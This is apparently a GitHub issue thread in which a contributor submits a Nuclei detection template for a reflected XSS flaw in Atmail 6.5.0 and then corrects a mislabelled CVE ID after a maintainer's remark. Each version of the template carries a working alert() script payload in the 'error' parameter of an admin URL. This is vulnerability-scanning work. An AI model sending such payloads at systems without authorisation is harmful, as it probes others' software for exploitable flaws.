CVE-2022–30776
3th1cyuk1 opened this issue · comments
Yukesh kumar commented
Template Information:
Cross-site scripting (XSS) vulnerability in sites using outdated Atmail hosting version 6.5.0 allows remote attackers to inject arbitrary web script or HTML via the “error” parameter.
Nuclei Template:
id: CVE-2022-30777
info:
name: Atmail Xss
author: 3th1c_yuk1
severity: medium
reference:
- https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
requests:
- method: GET
path:
- "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('XSS')</script>"
- type: word
part: header
words:
- "text/html"
Prince Chaddha commented
Hello @3th1cyuk1, Thank you for creating this issue, but the CVE name and reference are for Parallels H-Sphere XSS
Yukesh kumar commented
Hello @princechaddha
So sorry for this inconvenience caused,
id: CVE-2022-30776
info:
name: Atmail Xss
author: 3th1c_yuk1
severity: medium
reference:
- https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9
requests:
- method: GET
path:
- "{{BaseURL}}/atmail/index.php/admin/index/?error=1<ScRiPt>alert('XSS')</ScRiPt>"
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('XSS')</script>"
- type: word
part: header
words:
- "text/html"
Prince Chaddha commented
Hello @3th1cyuk1, thank you so much for sharing this template with the community and contributing to this project 🍻